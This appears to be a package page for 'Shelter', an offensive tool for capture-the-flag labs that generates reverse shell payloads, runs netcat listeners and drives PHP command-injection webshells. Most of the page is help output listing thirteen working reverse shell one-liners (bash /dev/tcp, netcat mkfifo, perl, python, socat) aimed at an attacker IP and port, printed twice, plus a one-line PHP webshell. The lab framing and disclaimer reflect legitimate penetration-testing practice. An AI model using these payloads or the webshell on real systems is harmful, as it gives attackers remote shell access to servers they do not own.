Reverse Shell Payload Handler
Project description
Shelter
Shelter the magical Shell Handler.
What is it ?
Shelter is a new way to catch reverse shell's and also reduces the effort of visiting pentestmonkey and highoncoffeefrequently for reverse shell payloads and changing of the Attacker-IP and Attacker-Port everytime.
Shelter is made to perform in 4 mode's. The required mode can be easily set by passing the argument of the mode to the script.
- rev : Generates and copies reverse shell payload with
IPandportset to clipboard and also starts up a netcat. - web : Webshell interactor for GET parameter command injection in php.
- webrev : Convert's a classic GET parameter command injection in php to a reverse shell.
- host : Will host post exploitation module's like
pspy,linpeasetc. from the attackbox usingpython http.serverorupdogand copy the web url to the clipboard.
This tool is focused towards the solver's of hackthebox, tryhackme or any other labs with vpn connection.
✨ Features
rev Module
- Generate and copy revshell payload with
ATTACKERIP[default: tun0] andATTACKERPORT. - Start's Up a netcat listener on that port for catching the shell.
- Support's
13language's of reverse shell payload's all tested. Only Linux payload's are supported for now. - Reduces the hassle of visiting
pentestmonkeyorhighoncoffeereverse shell cheatsheet for geting reverse shell payloads and changing theIPandPORTon it everytime. This tools is not claiming to be better than pentestmonkey or highoncoffee by any means.
web Module
- Reduces the hassle of writting commands in
burpsuitein time of php parameter command injection and url encoding every time. - Automatically, URL encodes the command before sending it.
webrev Module
- Converts a dumb GET parameter command injection to a reverse shell.
- Generates a reverse shell payload with set
ATTACKERIP[default : tun0] andATTACKERPORTand sends it to webserver url encoded. - Starts up a netcat listner on the given
ATTACKERPORTfor catching the shell.
host Module[Coming Soon...]
- It will create a
wwwdirectory withphpreverseshell,powershell reverseshell, while setting theATTACKERIPandATTACKERPORTand post exploitation tools likepspy,linpeas,winpeasetc. usingupdogor classicpython http.server. - It will also copy the url of the file hosted from the server to the clipboard for easy pasting and
wgetting
Usage
Rev Module
Help Menu
┌─[root@Xyan1d3]─[/opt/github/shelter]
└──╼ # ./shelter.py rev --help
usage: shelter.py rev [-h] {bash,bashi,bash196,bashrl,bash5,bashudp,nc_mkfifo,perl,py2,py,py2export,pyexport,socat} ...
optional arguments:
-h, --help show this help message and exit
Available Payloads:
{bash,bashi,bash196,bashrl,bash5,bashudp,nc_mkfifo,perl,py2,py,py2export,pyexport,socat}
bash echo base64_encoded_bash-i_payload |base64 -d|bash
bashi bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1
bash196 0<&196;exec 196<>/dev/tcp/ATTACKER_IP/ATTACKER_PORT; bash <&196 >&196 2>&196
bashrl exec 5<>/dev/tcp/ATTACKER_IP/ATTACKER_PORT;cat <&5 | while read line; do $line 2>&5 >&5; done
bash5 bash -i 5<> /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0<&5 1>&5 2>&5
bashudp bash -i >& /dev/udp/ATTACKER_IP/ATTACKER_PORT 0>&1
nc_mkfifo rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc ATTACKER_IP ATTACKER_PORT >/tmp/f
perl perl -e 'use Socket;$i="ATTACKER_IP";$p=ATTACKER_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton
($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("bash -i");};'
py2 python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",ATTACKER_PORT));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
py python3 -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",ATTACKER_PORT));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
py2export export RHOST="ATTACKER_IP";export RPORT=ATTACKER_PORT;python -c 'import
sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in
(0,1,2)];pty.spawn("bash")'
pyexport export RHOST="ATTACKER_IP";export RPORT=ATTACKER_PORT;python3 -c 'import
sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in
(0,1,2)];pty.spawn("bash")
socat socat TCP:ATTACKER_IP:ATTACKER_PORT EXEC:'bash',pty,stderr,setsid,sigint,sane
┌─[root@Xyan1d3]─[/opt/github/shelter]
└──╼ # ./shelter.py rev py --help
usage: shelter.py rev py [-h] [--nohandler] [-i 127.0.0.1] [-p 8888]
optional arguments:
-h, --help show this help message and exit
--nohandler Copies only the revshell payload. [Does not start handler]
-i 127.0.0.1 IP for reverse shell.
-p 8888 PORT for reverse shell.
Taking a reverse shell from a docker container.
Web Module
Help Menu
┌─[root@Xyan1d3]─[/opt/github/shelter]
└──╼ # ./shelter.py web --help
usage: shelter.py web [-h] [-f F] [-param PARAM] [--ssl] [--nossl] URL
positional arguments:
URL Target URL [http://127.0.0.1/cmd.php]
optional arguments:
-h, --help show this help message and exit
-f F Filename of the webshell [Default : cmd.php]. Incase you enter only ip in url arg.
-param PARAM GET parameter to send commands.[Default: cmd]
--ssl Force HTTPS
--nossl Force downgrade to HTTP
By default it assume's filename cmd.php and GET parameter cmd if not specified as an argument.
The php code responsible for getting a simple GET parameter webshell.
root@6a647b5a3d5f:~# cat cmd.php
<?php system($_GET[cmd]); ?>
Webshell on a docker container.
Webrev Module
Help Menu
┌─[root@Xyan1d3]─[/opt/github/shelter]
└──╼ # ./shelter.py webrev --help
usage: shelter.py webrev [-h] [-f F] [-param PARAM] [--ssl] [--nossl] URL {bash,bashi,bash196,bashrl,bash5,bashudp,nc_mkfifo,perl,py2,py,py2export,pyexport,socat} ...
positional arguments:
URL Target URL [http://127.0.0.1/cmd.php]
optional arguments:
-h, --help show this help message and exit
-f F Filename of the webshell [Default : cmd.php]. Incase you enter only ip in url arg.
-param PARAM GET parameter to send commands.[Default: cmd]
--ssl Force HTTPS
--nossl Force downgrade to HTTP
Available Payloads:
{bash,bashi,bash196,bashrl,bash5,bashudp,nc_mkfifo,perl,py2,py,py2export,pyexport,socat}
bash echo base64_encoded_bash-i_payload |base64 -d|bash
bashi bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1
bash196 0<&196;exec 196<>/dev/tcp/ATTACKER_IP/ATTACKER_PORT; bash <&196 >&196 2>&196
bashrl exec 5<>/dev/tcp/ATTACKER_IP/ATTACKER_PORT;cat <&5 | while read line; do $line 2>&5 >&5; done
bash5 bash -i 5<> /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0<&5 1>&5 2>&5
bashudp bash -i >& /dev/udp/ATTACKER_IP/ATTACKER_PORT 0>&1
nc_mkfifo rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc ATTACKER_IP ATTACKER_PORT >/tmp/f
perl perl -e 'use Socket;$i="ATTACKER_IP";$p=ATTACKER_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton
($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("bash -i");};'
py2 python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",ATTACKER_PORT));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
py python3 -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",ATTACKER_PORT));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
py2export export RHOST="ATTACKER_IP";export RPORT=ATTACKER_PORT;python -c 'import
sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in
(0,1,2)];pty.spawn("bash")'
pyexport export RHOST="ATTACKER_IP";export RPORT=ATTACKER_PORT;python3 -c 'import
sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in
(0,1,2)];pty.spawn("bash")
socat socat TCP:ATTACKER_IP:ATTACKER_PORT EXEC:'bash',pty,stderr,setsid,sigint,sane
Revshell on a docker container.
Disclaimer
Don't use this script for any malicious or illegal purpose's. The Author or any contributor of this repository or tool is not responsible for any of those activities.
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
pwnshelter-2.0.1.tar.gz
(13.7 kB
view hashes)
Built Distribution
pwnshelter-2.0.1-py3-none-any.whl
(16.2 kB
view hashes)
Close
Hashes for pwnshelter-2.0.1-py3-none-any.whl
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 | 80dccce5a944cf26bfdaf15f9035c89d2f53334d506b3a8c427d4279bf6b4b36 |
|
| MD5 | 150cfa4fdfa9401c183948df4e854d40 |
|
| BLAKE2b-256 | 585617069b5f60e9198453e608468c16746b9aa94d7d8ac3aac45e0d520fa359 |
